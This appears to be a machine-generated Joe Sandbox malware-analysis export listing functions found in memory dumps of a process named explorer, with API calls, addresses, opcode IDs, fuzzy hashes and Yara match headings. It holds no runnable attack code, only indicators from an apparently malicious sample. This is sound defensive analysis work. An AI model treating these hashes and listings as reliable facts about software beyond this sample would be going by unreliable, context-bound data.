                                                                                                                                                                                                                                  • Opcode ID: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
                                                                                                                                                                                                                                  • Instruction ID: ca837552ac23bbb25486bebb8bd7eb994e158c6d5d77501213c49c17cfcc747b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F08229601B0A85EE286B70FC543292320FB84760F841C34DA0E47B66DF3C92559351
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C35DB26
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0C35DB6C
                                                                                                                                                                                                                                    • Part of subcall function 0C36AFAC: setlocale.LIBCMT ref: 0C36AFC0
                                                                                                                                                                                                                                    • Part of subcall function 0C36AFAC: _Yarn.LIBCPMT ref: 0C36AFDA
                                                                                                                                                                                                                                    • Part of subcall function 0C36AFAC: setlocale.LIBCMT ref: 0C36AFE9
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C35DB8B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C35DB9C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: pression.
                                                                                                                                                                                                                                  • API String ID: 409252694-815315158
                                                                                                                                                                                                                                  • Opcode ID: d8d1b0fd8525a88e1bc35c012dce00b6b0b8970b68ecff29792a992916a74fd3
                                                                                                                                                                                                                                  • Instruction ID: 57d9c4e81e7b915f62879d266dc6a26b824102001f1930f893a1808d0adab2a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d1b0fd8525a88e1bc35c012dce00b6b0b8970b68ecff29792a992916a74fd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F067A233054591DB14FF25EA906EC6321FB94788F8884215A0D4F96CEF24C98ECB42
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0F3CE726
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0F3CE76C
                                                                                                                                                                                                                                    • Part of subcall function 0F3DBBAC: setlocale.LIBCMT ref: 0F3DBBC0
                                                                                                                                                                                                                                    • Part of subcall function 0F3DBBAC: _Yarn.LIBCPMT ref: 0F3DBBDA
                                                                                                                                                                                                                                    • Part of subcall function 0F3DBBAC: setlocale.LIBCMT ref: 0F3DBBE9
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0F3CE78B
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3CE79C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 54f8d3a0f0436ce85f1ce92583ecf7ab21f190b34fe651aa93b6d57b470c6afc
                                                                                                                                                                                                                                  • Instruction ID: eceb01b80e684ce176376d44c4de2dcebaa64a2851fa7a624bca8eb2734ab385
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54f8d3a0f0436ce85f1ce92583ecf7ab21f190b34fe651aa93b6d57b470c6afc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F01D72210A4591CB14FF25ED502ACA321FB94BE4F8440359A4E4756AEF6CCE9AC7C0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: 984353ad4a58b6f003011b224ca72ddc36c0b4da5068afe336f99dafdafbc72c
                                                                                                                                                                                                                                  • Instruction ID: 4b89842f95f1c2e6830b29a50bc4a2e2059a1397676734cfe22d2b1c9a2a1630
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 984353ad4a58b6f003011b224ca72ddc36c0b4da5068afe336f99dafdafbc72c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC31D336214B8086D7208F15D5806A9BFB5FB85FD5F288129EB9967B68EB38C547CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                                                  • Opcode ID: 25ad539c16738e0748dbc861282459023939614fd04c275b88109c5013293657
                                                                                                                                                                                                                                  • Instruction ID: 6c1ae1a27f88813a777395a7e352310cf88bb256d659072e5771aaf992336dc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25ad539c16738e0748dbc861282459023939614fd04c275b88109c5013293657
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA31B332314790C6DB20CF25E58066DBBA5FF85FE4F585226EB8957B9ADB38D441C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                                                                                  • Opcode ID: 85ef4d61709b9a753979fa94aa1d7a0c3e04f881cd7fff5174cf9ca040777e95
                                                                                                                                                                                                                                  • Instruction ID: 900189acb5acdb1eaef527e6c24c3b913f4be146cbfc2a03248f17cba2abea84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85ef4d61709b9a753979fa94aa1d7a0c3e04f881cd7fff5174cf9ca040777e95
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0521B722A5CB5186FF38BB11E49437A33E5A701FB5F84052ECD424A963D75CDD88A7C1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _malloc_dbglstrlenmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3719054251-0
                                                                                                                                                                                                                                  • Opcode ID: 059feee17097cd55d77ffe9413322c52f1ba9c365dcf953fa348bac87858a951
                                                                                                                                                                                                                                  • Instruction ID: d5f38193dfa2f7abff83a9772b8e67b7979d11925a28218995191bf2a1a4da12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 059feee17097cd55d77ffe9413322c52f1ba9c365dcf953fa348bac87858a951
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F0C22171679282EA258B26F94433DA6A2EB4CFE0F484438DE4E47F29EF3CD5498740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C36BD29
                                                                                                                                                                                                                                    • Part of subcall function 0C36F3DC: _getptd_noexit.LIBCMT ref: 0C36F3E2
                                                                                                                                                                                                                                    • Part of subcall function 0C36F3DC: _amsg_exit.LIBCMT ref: 0C36F3F2
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0C36BD37
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C36BD3C
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0C36BD58
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C36BD68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823043651-0
                                                                                                                                                                                                                                  • Opcode ID: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
                                                                                                                                                                                                                                  • Instruction ID: 9d78a7b3dd8cb71a4e5b2dcb04084170a5f232a04f239b3a60108037a7ca3575
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEE03022331684C2CE656F95E0402ECA260FB8DB88F1CC1728A448FA0DDE74C4949F22
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B994E1
                                                                                                                                                                                                                                    • Part of subcall function 08B93F34: _getptd_noexit.LIBCMT ref: 08B93F3A
                                                                                                                                                                                                                                    • Part of subcall function 08B93F34: _amsg_exit.LIBCMT ref: 08B93F4A
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 08B994EF
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B994F4
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 08B99510
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B99520
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823043651-0
                                                                                                                                                                                                                                  • Opcode ID: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
                                                                                                                                                                                                                                  • Instruction ID: 870db33b70eae7582bcb70cad9e317c014a6a763bbd27bf81884724d5d121202
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE065762166C1C1CE61AB65E0801AEB7A0E74CBC2F1C90F9DBC907305DE20D491C750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBA0E1
                                                                                                                                                                                                                                    • Part of subcall function 08CB4B34: _getptd_noexit.LIBCMT ref: 08CB4B3A
                                                                                                                                                                                                                                    • Part of subcall function 08CB4B34: _amsg_exit.LIBCMT ref: 08CB4B4A
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 08CBA0EF
                                                                                                                                                                                                                                    • Part of subcall function 08CB5EFC: DecodePointer.KERNEL32 ref: 08CB5F07
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBA0F4
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 08CBA110
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBA120
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                                                  • Opcode ID: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
                                                                                                                                                                                                                                  • Instruction ID: fd254e0963ef050e0c4f87613a10e1bdb9fce88bd5a7583f646112d7a870aff9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20E0393620AEE0C0CE69AB66E1812ED7275EB48B82F0C8125CB890B706DE24C8919714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3DC929
                                                                                                                                                                                                                                    • Part of subcall function 0F3DFFDC: _getptd_noexit.LIBCMT ref: 0F3DFFE2
                                                                                                                                                                                                                                    • Part of subcall function 0F3DFFDC: _amsg_exit.LIBCMT ref: 0F3DFFF2
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0F3DC937
                                                                                                                                                                                                                                    • Part of subcall function 0F3E16B8: DecodePointer.KERNEL32 ref: 0F3E16C3
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3DC93C
                                                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0F3DC958
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3DC968
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                                                  • Opcode ID: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
                                                                                                                                                                                                                                  • Instruction ID: d14a908f5833e98290ef23bb64f4bb8784e42789c5d63c75e980ca33c104631b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1E03923225680C4CB117B75F1802AD7369EB89BF8F4CA231BA9A1B707DF38C491C755
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 08B926BE
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 08B926CA
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _FF_MSGBANNER.LIBCMT ref: 08B923F4
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _NMSG_WRITE.LIBCMT ref: 08B923FE
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _callnewh.LIBCMT ref: 08B92432
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B9243D
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B92448
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 08B92713
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                                  • String ID: ort not loaded
                                                                                                                                                                                                                                  • API String ID: 431260796-2308354243
                                                                                                                                                                                                                                  • Opcode ID: 7665fe9ceecca017d0a85dbddab1a3ea81ff5fedb45c542187416bd9f05890ad
                                                                                                                                                                                                                                  • Instruction ID: 2ec159c14bab9a29db173a489d59ae44a3f688e596f510705965295db50d8dd4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7665fe9ceecca017d0a85dbddab1a3ea81ff5fedb45c542187416bd9f05890ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A01F529B05B4AA1DE14DB51F59036873A4F789385F485070CEED07B25EF3CC189CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 08CB32BE
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 08CB32CA
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _FF_MSGBANNER.LIBCMT ref: 08CB2FF4
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _NMSG_WRITE.LIBCMT ref: 08CB2FFE
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: HeapAlloc.KERNEL32 ref: 08CB3019
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _callnewh.LIBCMT ref: 08CB3032
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB303D
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB3048
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 08CB3313
                                                                                                                                                                                                                                    • Part of subcall function 08CB4704: RtlPcToFileHeader.NTDLL ref: 08CB4793
                                                                                                                                                                                                                                    • Part of subcall function 08CB4704: RaiseException.KERNEL32 ref: 08CB47D2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                  • Opcode ID: 823a9260558515b389c713c7517b614d42d336d975b9489b46443dbdab2b5a53
                                                                                                                                                                                                                                  • Instruction ID: 0bbf7db49a99ffceafd296684ce1a6aa9b89a2bb58832edcf4d25b9f3db3b857
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 823a9260558515b389c713c7517b614d42d336d975b9489b46443dbdab2b5a53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E01F525705F8A80EF189BA1F1507E863B4FB88785F444020DA8D07B66EF38C19ACB01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcesslstrcatlstrcpy
                                                                                                                                                                                                                                  • String ID: h
                                                                                                                                                                                                                                  • API String ID: 1023358534-2439710439
                                                                                                                                                                                                                                  • Opcode ID: 606a3f0513c2a8636585ca927cd899bd88e9c71b2d70d5b99ca42d7cb687c9bd
                                                                                                                                                                                                                                  • Instruction ID: d6007a74486c7ebba4fd02523cb0ac92fe6cf6df2ff8420d256dcace508d13ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606a3f0513c2a8636585ca927cd899bd88e9c71b2d70d5b99ca42d7cb687c9bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A112E33A24A459AE720CB68E8447AE77F4F788358F400125DB8D42E68DF7CC15CCB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0C36BD1C: _getptd.LIBCMT ref: 0C36BD29
                                                                                                                                                                                                                                    • Part of subcall function 0C36BD1C: _inconsistency.LIBCMT ref: 0C36BD37
                                                                                                                                                                                                                                    • Part of subcall function 0C36BD1C: _getptd.LIBCMT ref: 0C36BD3C
                                                                                                                                                                                                                                    • Part of subcall function 0C36BD1C: _inconsistency.LIBCMT ref: 0C36BD58
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C37D07B
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C37D081
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C37D094
                                                                                                                                                                                                                                    • Part of subcall function 0C36BDAC: _getptd.LIBCMT ref: 0C36BDB5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
                                                                                                                                                                                                                                  • Instruction ID: 0a275478d3be764ac9e9b43edebd064dc70bec15bc099c50366e706eed6c3bcf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F0816262064589CB309F72D8843EC2364FF58B98F18A221CE498BB09CE34C4C6DB52
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 08B994D4: _getptd.LIBCMT ref: 08B994E1
                                                                                                                                                                                                                                    • Part of subcall function 08B994D4: _inconsistency.LIBCMT ref: 08B994EF
                                                                                                                                                                                                                                    • Part of subcall function 08B994D4: _getptd.LIBCMT ref: 08B994F4
                                                                                                                                                                                                                                    • Part of subcall function 08B994D4: _inconsistency.LIBCMT ref: 08B99510
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08B9C010
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B9C016
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B9C029
                                                                                                                                                                                                                                    • Part of subcall function 08B99564: _getptd.LIBCMT ref: 08B9956D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
                                                                                                                                                                                                                                  • Instruction ID: 5823a65d4fbdc6f64d143c7225be7ba1d857cbe244d1e97e17a5113bdd7d2126
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF04F36241681CACF30EF31DC903AD6B64E749B9AF48A4B9DAC94B714EF31C482D740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 08CBA0D4: _getptd.LIBCMT ref: 08CBA0E1
                                                                                                                                                                                                                                    • Part of subcall function 08CBA0D4: _inconsistency.LIBCMT ref: 08CBA0EF
                                                                                                                                                                                                                                    • Part of subcall function 08CBA0D4: _getptd.LIBCMT ref: 08CBA0F4
                                                                                                                                                                                                                                    • Part of subcall function 08CBA0D4: _inconsistency.LIBCMT ref: 08CBA110
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08CBCC10
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBCC16
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBCC29
                                                                                                                                                                                                                                    • Part of subcall function 08CBA164: _getptd.LIBCMT ref: 08CBA16D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
                                                                                                                                                                                                                                  • Instruction ID: c543fca8dd5584f5e7e76934a762c835fd731455275edf761fdf3afba8c9c8d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF04F76281E91CACB24AF32D8803ED2374E755B9AF485535DE494B704EF34C9C2D744
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC91C: _getptd.LIBCMT ref: 0F3DC929
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC91C: _inconsistency.LIBCMT ref: 0F3DC937
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC91C: _getptd.LIBCMT ref: 0F3DC93C
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC91C: _inconsistency.LIBCMT ref: 0F3DC958
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0F3EDC7B
